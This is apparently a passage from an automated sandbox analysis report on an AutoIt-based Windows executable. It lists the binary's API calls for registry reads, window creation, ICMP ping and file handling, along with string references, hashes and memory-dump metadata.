                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 93795bd3a372b633b936f3b469ccc5a05fa93fa8212bb45f518a40c8b13be45e
                                                  • Instruction ID: bc04734f05061360748f4d81c86a1c3742dd03cedec88207ab58cce29661a6af
                                                  • Opcode Fuzzy Hash: 93795bd3a372b633b936f3b469ccc5a05fa93fa8212bb45f518a40c8b13be45e
                                                  • Instruction Fuzzy Hash: 2D212EB1D41319AFEB20DF94E888BDEBBF4FB08700F50411AF594A6288D7BA0544DF91
                                                  APIs
                                                    • Part of subcall function 00FB00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00FA3094), ref: 00FB00ED
                                                    • Part of subcall function 00FB08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FA309F), ref: 00FB08E3
                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FA30E2
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FE01BA
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FE01FB
                                                  • RegCloseKey.ADVAPI32(?), ref: 00FE0239
                                                  • _wcscat.LIBCMT ref: 00FE0292
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                  • API String ID: 2673923337-2727554177
                                                  • Opcode ID: fe4f50e35f0f240ebdffe40ca5a438fcc8881b835e7e0d9673e33f5859634202
                                                  • Instruction ID: 3683db2f72c533ef53dcbe390c21577f968e503492e280ad01709001cb616a3f
                                                  • Opcode Fuzzy Hash: fe4f50e35f0f240ebdffe40ca5a438fcc8881b835e7e0d9673e33f5859634202
                                                  • Instruction Fuzzy Hash: F971B2715093019EC324EF66DC819ABBBE8FF85390F40852EF885C71A4EB799944DB52
                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00FA5156
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00FA5165
                                                  • LoadIconW.USER32(00000063), ref: 00FA517C
                                                  • LoadIconW.USER32(000000A4), ref: 00FA518E
                                                  • LoadIconW.USER32(000000A2), ref: 00FA51A0
                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA51C6
                                                  • RegisterClassExW.USER32(?), ref: 00FA521C
                                                    • Part of subcall function 00F93411: GetSysColorBrush.USER32(0000000F), ref: 00F93444
                                                    • Part of subcall function 00F93411: RegisterClassExW.USER32(00000030), ref: 00F9346E
                                                    • Part of subcall function 00F93411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F9347F
                                                    • Part of subcall function 00F93411: InitCommonControlsEx.COMCTL32(?), ref: 00F9349C
                                                    • Part of subcall function 00F93411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F934AC
                                                    • Part of subcall function 00F93411: LoadIconW.USER32(000000A9), ref: 00F934C2
                                                    • Part of subcall function 00F93411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F934D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 423443420-4155596026
                                                  • Opcode ID: 82098a2737d23d538146487cbd631cf21bd5a4348d4c652990c10ee1e87b78ac
                                                  • Instruction ID: 3fe8487f8456e7dbb514db2a4945802d91c607d66b5c4f81bd711abfe9f4f8d6
                                                  • Opcode Fuzzy Hash: 82098a2737d23d538146487cbd631cf21bd5a4348d4c652990c10ee1e87b78ac
                                                  • Instruction Fuzzy Hash: 64214B71D00308AFEB319FA4ED09B9E7BB4FB08750F50415AF584A6298D7BB5950AF84
                                                  APIs
                                                  • WSAStartup.WS2_32(00000101,?), ref: 01005E7E
                                                  • inet_addr.WSOCK32(?,?,?), ref: 01005EC3
                                                  • gethostbyname.WS2_32(?), ref: 01005ECF
                                                  • IcmpCreateFile.IPHLPAPI ref: 01005EDD
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01005F4D
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01005F63
                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 01005FD8
                                                  • WSACleanup.WSOCK32 ref: 01005FDE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: c99a650bbe1754b3c1d9e96db6b9ee62495cc4fb13f7ad20063a0b0a2a80ce1d
                                                  • Instruction ID: a55011418f34b877c87169305865100e16edac0ccda4ecb827bad8d83c6ec9c0
                                                  • Opcode Fuzzy Hash: c99a650bbe1754b3c1d9e96db6b9ee62495cc4fb13f7ad20063a0b0a2a80ce1d
                                                  • Instruction Fuzzy Hash: 35516D716043019FEB62EF24CC49B2ABBE4AF88710F144569F999DB2D1DB78E800DF42
                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00FA4E22
                                                  • KillTimer.USER32(?,00000001), ref: 00FA4E4C
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA4E6F
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA4E7A
                                                  • CreatePopupMenu.USER32 ref: 00FA4E8E
                                                  • PostQuitMessage.USER32(00000000), ref: 00FA4EAF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 129472671-2362178303
                                                  • Opcode ID: 9614e153c2a83ee2f1258a7c55a1b0970f0bb97224c20110bde247adb25741d2
                                                  • Instruction ID: 8d3b10005b8698ba8b84be4ff5982b4448f9eb227325d72fcc9ff0cf997ea813
                                                  • Opcode Fuzzy Hash: 9614e153c2a83ee2f1258a7c55a1b0970f0bb97224c20110bde247adb25741d2
                                                  • Instruction Fuzzy Hash: 65413BB2A40345ABDF355F28DC89B7F7655FBC2310F500115F9819118ACAFAAC50FB61
                                                  APIs
                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FE0C5B
                                                    • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                  • _memset.LIBCMT ref: 00FA5787
                                                  • _wcscpy.LIBCMT ref: 00FA57DB
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FA57EB
                                                  • __swprintf.LIBCMT ref: 00FE0CD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                  • String ID: Line %d: $AutoIt -
                                                  • API String ID: 230667853-4094128768
                                                  • Opcode ID: 98000e8fc541c5a89cc5a32ca3cb5214229b78d68c304290fcd6a7837e08e5e7
                                                  • Instruction ID: d8ad38bf7706f1f75b4b5b9b600371b174b741ac23807cd4047ed40cefa170c8
                                                  • Opcode Fuzzy Hash: 98000e8fc541c5a89cc5a32ca3cb5214229b78d68c304290fcd6a7837e08e5e7
                                                  • Instruction Fuzzy Hash: 9341A1B1508304AAC321EB64DC85BEF77ECAF45360F10061EF58592091EF78A649EB93
                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA5109
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA512A
                                                  • ShowWindow.USER32(00000000), ref: 00FA513E
                                                  • ShowWindow.USER32(00000000), ref: 00FA5147
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit
                                                  • API String ID: 1584632944-3779509399
                                                  • Opcode ID: 18662e910d083077b174fe603c002224271cfd664e3b5286940b601843e5a198
                                                  • Instruction ID: 9bc0b154d56c7910c13d94f93c04a9409eab3ee8a78f715050c4414df147789c
                                                  • Opcode Fuzzy Hash: 18662e910d083077b174fe603c002224271cfd664e3b5286940b601843e5a198
                                                  • Instruction Fuzzy Hash: 54F0FE71A413947EEB315A27AC4CE373E7DE7C6F90F50011EF944A6158C6BA1851EBB0
                                                  APIs
                                                    • Part of subcall function 00FA4A8C: _fseek.LIBCMT ref: 00FA4AA4
                                                    • Part of subcall function 00FF9CF1: _wcscmp.LIBCMT ref: 00FF9DE1
                                                    • Part of subcall function 00FF9CF1: _wcscmp.LIBCMT ref: 00FF9DF4
                                                  • _free.LIBCMT ref: 00FF9C5F
                                                  • _free.LIBCMT ref: 00FF9C66
                                                  • _free.LIBCMT ref: 00FF9CD1
                                                    • Part of subcall function 00FB2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00FB9C54,00000000,00FB8D5D,00FB59C3), ref: 00FB2F99
                                                    • Part of subcall function 00FB2F85: GetLastError.KERNEL32(00000000,?,00FB9C54,00000000,00FB8D5D,00FB59C3), ref: 00FB2FAB
                                                  • _free.LIBCMT ref: 00FF9CD9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                  • API String ID: 1552873950-2806939583
                                                  • Opcode ID: 79ffa71ae77a183ef4aa62231628ec4741f8a9b8a6cf8a62369e556005f1054f
                                                  • Instruction ID: 2a149494dd8ca8011b47373094cbbb4a43068fbcecae0583d94d89c7b38979c2
                                                  • Opcode Fuzzy Hash: 79ffa71ae77a183ef4aa62231628ec4741f8a9b8a6cf8a62369e556005f1054f
                                                  • Instruction Fuzzy Hash: 3C513CB1D04219ABDB249F65DC41BAEBBB9FF48304F00009EF649A3251DB755E809F58
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                  • Instruction ID: 90d41756002963a05f3caf36776a8e958cc5495a9abd3ebd8abb8ef52d14a967
                                                  • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                  • Instruction Fuzzy Hash: FF51B771F00B09DBDB249E6AC8807EE77A6AF40B30F344729F825961D0DB789D51AF40
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F952E6
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F9534A
                                                  • TranslateMessage.USER32(?), ref: 00F95356
                                                  • DispatchMessageW.USER32(?), ref: 00F95360
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Message$Peek$DispatchTranslate
                                                  • String ID:
                                                  • API String ID: 1795658109-0
                                                  • Opcode ID: 0dc3a0034b2557513dcd05cb148df5c7be21b36a1fdb7e7b9b31b1fc3db8781a
                                                  • Instruction ID: 7dfce4e0282fe27b1797b7f954c43fcd4611346a2a36815552fcd29869c4a09b
                                                  • Opcode Fuzzy Hash: 0dc3a0034b2557513dcd05cb148df5c7be21b36a1fdb7e7b9b31b1fc3db8781a
                                                  • Instruction Fuzzy Hash: 4D314631D00B069BFF328A74D845FBA37E9AB01B54F64006DF492971C4D3BA9889FB12
                                                  APIs
                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F91275,SwapMouseButtons,00000004,?), ref: 00F912A8
                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F91275,SwapMouseButtons,00000004,?), ref: 00F912C9
                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00F91275,SwapMouseButtons,00000004,?), ref: 00F912EB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  • Opcode ID: 0bcd0f3c16042df06a9dab9eebdb00a897d655423c6abe8c70f96a143a279688
                                                  • Instruction ID: d925192fb87a9901227045d4aa51741a396fa438ea6db8ada2707a2bea53ce40
                                                  • Opcode Fuzzy Hash: 0bcd0f3c16042df06a9dab9eebdb00a897d655423c6abe8c70f96a143a279688
                                                  • Instruction Fuzzy Hash: FB115A71A10209BFEF218FA5D884EAFBBB8FF04750F104569F845E7204D2319E40ABA0
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,01022C4C), ref: 00FF3F57
                                                  • GetLastError.KERNEL32 ref: 00FF3F66
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FF3F75
                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,01022C4C), ref: 00FF3FD2
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                  • String ID:
                                                  • API String ID: 2267087916-0
                                                  • Opcode ID: 6fa52f758e7c229286e6dedd37c49586b27b21aaff37359076140604b199fcbd
                                                  • Instruction ID: ceb644a6e66e48a911d4e05ae202ba0e3002def6c62b9622635d923ae5c876a6
                                                  • Opcode Fuzzy Hash: 6fa52f758e7c229286e6dedd37c49586b27b21aaff37359076140604b199fcbd
                                                  • Instruction Fuzzy Hash: 0F2191709083159F8714EF28C8818AAB7F4BE5A364F20461DF5A5C72F1D731DA45EB92
                                                  APIs
                                                  • _memset.LIBCMT ref: 00FA5B58
                                                    • Part of subcall function 00FA56F8: _memset.LIBCMT ref: 00FA5787
                                                    • Part of subcall function 00FA56F8: _wcscpy.LIBCMT ref: 00FA57DB
                                                    • Part of subcall function 00FA56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FA57EB
                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00FA5BAD
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA5BBC
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FE0D7C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                  • String ID:
                                                  • API String ID: 1378193009-0
                                                  • Opcode ID: 034dcfb99d06f2700229bea5288d05d0702576f2e62dffeb67361a3a177119ff
                                                  • Instruction ID: 6370b3467139d59b804a201a9eaf8a1f447543b2c7c3a701d53a5b7c9f179ea6
                                                  • Opcode Fuzzy Hash: 034dcfb99d06f2700229bea5288d05d0702576f2e62dffeb67361a3a177119ff
                                                  • Instruction Fuzzy Hash: 72210AB0D047849FE7728B649C95BEBBBECAF02718F04008DF6D956245CB7529C4EB51
                                                  APIs
                                                    • Part of subcall function 00FA49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00FA27AF,?,00000001), ref: 00FA49F4
                                                  • _free.LIBCMT ref: 00FDFB04
                                                  • _free.LIBCMT ref: 00FDFB4B
                                                    • Part of subcall function 00FA29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FA2ADF
                                                  Strings
                                                  • Bad directive syntax error, xrefs: 00FDFB33
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                  • String ID: Bad directive syntax error
                                                  • API String ID: 2861923089-2118420937
                                                  • Opcode ID: 77a27acfc54c6b67c6d21a5ad5c909b89ab830ad81fa77d62c15ff909db6c0a8
                                                  • Instruction ID: bd8753a611b1fb9f6ee097d0fd5f58c6391079e1af030862b900b6a99438421e
                                                  • Opcode Fuzzy Hash: 77a27acfc54c6b67c6d21a5ad5c909b89ab830ad81fa77d62c15ff909db6c0a8
                                                  • Instruction Fuzzy Hash: D9916D71D10219AFCF14EFA4CC919EDB7B5BF05310F14452AF816AB2A1DB38AA09EB50
                                                  APIs
                                                    • Part of subcall function 00FA4AB2: __fread_nolock.LIBCMT ref: 00FA4AD0
                                                  • _wcscmp.LIBCMT ref: 00FF9DE1
                                                  • _wcscmp.LIBCMT ref: 00FF9DF4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$__fread_nolock
                                                  • String ID: FILE
                                                  • API String ID: 4029003684-3121273764
                                                  • Opcode ID: 196b1a8802b7e04784abd58d4d71a4478ab5d693832ad1f3bb7727ec97b31ca2
                                                  • Instruction ID: 3592884680e6883dd7c529e3554de05c5d0181f48712be3c4a6b1d36a44a97cd
                                                  • Opcode Fuzzy Hash: 196b1a8802b7e04784abd58d4d71a4478ab5d693832ad1f3bb7727ec97b31ca2
                                                  • Instruction Fuzzy Hash: 2F41E672A44209BADF21DEA4CC45FEF77BDDF85710F00046AFA01E7290DAB9AD059B64
                                                  APIs
                                                  • _memset.LIBCMT ref: 00FE032B
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00FE0375
                                                    • Part of subcall function 00FB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA2A58,?,00008000), ref: 00FB02A4
                                                    • Part of subcall function 00FB09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00FB09E4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
